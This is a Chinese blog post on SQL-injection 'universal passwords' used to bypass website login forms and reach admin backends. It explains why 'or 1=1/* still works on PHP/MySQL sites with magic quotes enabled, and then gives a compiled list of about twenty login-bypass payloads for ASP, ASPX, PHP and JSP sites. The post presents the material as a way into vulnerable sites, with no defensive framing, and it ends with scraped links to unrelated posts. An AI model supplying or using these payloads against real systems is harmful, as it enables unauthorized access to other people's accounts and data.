mysql登录框万能密码_网站登录万能密码
---恢复内容开始---
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是
百分之百。
可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了
PHP注入。
其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。
其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。
如果你用这样的万能密码‘or'='or’,当然进不去,理由是GPC开启的时候单引号会被转换。
PHP注入时我常用的万能密码是:‘or 1=1/*.
那我们分析一下为什么这可以进后台。
如果sql语句这样写:“SELECT * FROM admin where name=’”.$_POST['name'].“‘and
password=’”.$_POST['password'].“‘”,那我们在帐号处输入万能密码'or 1=1/*,密码随便输,sql
语句就成了select * from admin where name=''or 1=1/*' and password=’任意字符‘。
/*为mysql的注释符,这样后面的东西就都被注释掉了,也就是为什么密码随便输的原因。
假设GPC转换没有开启,那么请看:where name=''or 1=1(*/后面的东西被注释掉了),
name='’的逻辑值为假,而后面的1=1逻辑值则为真,对于整体就成了假 or 真,最终的逻辑值
还是真,就进后台了。
那么如果GPC转换开启了,就对单引号进行了转换。语句就变成了where name='\'or 1=1,在
看一下和刚才有什么区别,无非是多了个\。name='\‘与name='’的逻辑值一样,都为假,那1=1
为真,总的sql语句的逻辑值不还是真吗?那有进不去后台的理由吗?
所以总的来说,php网站的万能密码可以这样写:‘or 1=1/*,而GPC转换是否开启对它没有任
何影响!
所以请改变你的想法:存在字符型注入的php网站是可以用万能密码'or 1=1/*的
---恢复内容结束---
下面附一个万能密码合辑
asp aspx万能密码
1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1
17..admin’ or ‘a’=’a 密码随便
PHP万能密码
‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1
jsp 万能密码
1’or’1’=’1
admin’ OR 1=1/*
————————————————
mysql登录框万能密码_网站登录万能密码相关推荐
- MySQL笔记 —— jdbc工具类(网站的修改密码,注册账号,注销账号功能)
在之前的这篇博客里面MySQL笔记 -- jdbc连接数据库(增删改查,sql注入,网站登录检查) 写了网站登录检查的代码,通过将用户输入的用户名和密码与数据库中存储的用户名和密码进行比较,如果一致则 ...
- 如何取消windows XP登录框,让其自动登录
如何取消windows XP登录框,让其自动登录 第一种方法 在Windows XP中单击"开始→运行" 输入 rundll32 netplwiz.dll,UsersRunDll ...
- 仿简书登录框,可删除内容或显示密码框的内容
简书App 是我很喜欢的一款软件.今天就模仿了一下他的登录框.先上图: 好了下面上代码,自定义ImgEditText 继承与EditText.重写一些方法. package lyf.myimgedit ...
- 如何设置win10登录不需输入开机密码_?win10开机密码取消的方法
最近帮朋友安装了最新的Win10系统,不过好友嫌Win10开机输入密码比较麻烦,想要取消掉.Win10开机密码怎么取消?相信很多安装Win10的朋友,都会觉得每次开机都需要输入密码比较麻烦.下面脚本之 ...
- navicat for mysql 修改密码_怎么修改navicat密码
方法1: 用SET PASSWORD命令 首先登录MySQL. 格式:mysql> set password for 用户名@localhost = password('新密码'); 例子:my ...
- java 登录按钮响应数据库_用户登录功能的实现—从前端到后台(包括数据库)...
温馨提示:本文难度有点大,建议收藏后在阅读! 首先给大家分享一件糗事! 本来今天这篇文会很长的 写到一半突然发现 还没有给大家分享 数据库 jdbc MVC模式 直接就来分享实战了 我的锅! 源码会分 ...
- cas登录成功什么意思_单点登录系统和CAS的简介
---恢复内容开始--- 什么是单点登录? 单点登录(Single Sign On),简称为SSO,是目前比较流行的企业业务整合的解决方案之一.SSO的定义是在多个应用系统中,用户只需要登录一次就可以 ...
- openstack登录认证出现错误_无法登录的用户 | 一次问题排查过程
点击上方"蓝字"关注我们 0 "有用户在手机端认证失败." ins项目的微信群里的客户又遇到了新的问题. "不像是网络问题,感觉是后端服务的问题.&q ...
- 神界危机3.4隐藏英雄密码_这就是我解决密码记忆危机的方法
神界危机3.4隐藏英雄密码 Note : This content applies to those who have spent a good amount of frustrating time ...
- win10删除开机密码_取消WIN10开机密码的方法
步骤/方法: 1.首先点击Win10桌面左下角的Windows开始图标,进入Win10开始菜单,打开开始菜单后,在底部搜索框中键入"netplwiz"命令,如下图所示: 2.之后会 ...
最新文章
- Hibernate 二级缓存使用
- 主成分分析(PCA)算法,K-L变换 角度
- 基于kNN的手写字体识别——《机器学习实战》笔记
- spark mongo java_Spark Mongodb集成 - Python版
- python3 unicode字符串_【已解决】Python3中如何声明字符串是unicode类型以避免log日志打印出错...
- simbert文本相似度,短文本语义匹配模型
- js 拉勾网效果_python爬取拉勾网职位数据
- 返回目录中所有JPG图像的文件名列表
- springboot缓存注解——@Cacheable和@CacheConfig
- 没有人会认真阅读协议,有恶意皆无效
- linux系统fsck.ext4,Ext4文件系统fsck后损坏修复过程一例
- typescript元组
- VMware16安装MacOS Big Sur系统
- php js广告,JavaScript_用JS调用谷歌 AdSense广告的方法, 具体的google广告的js文件做 - phpStudy...
- Oracle 触发器的使用(带案例详解)
- 微信支付二维码上添加logo
- Jmeter接口压力测试(先登录再测接口)
- 苏轼写的是一首八句的七律,这首绝句应该是后人假冒苏轼的作品。
- 数据中聚类个数的确定(Determining the number of clusters in a data set)
- vue.js的手脚架vue-cli项目搭建的步骤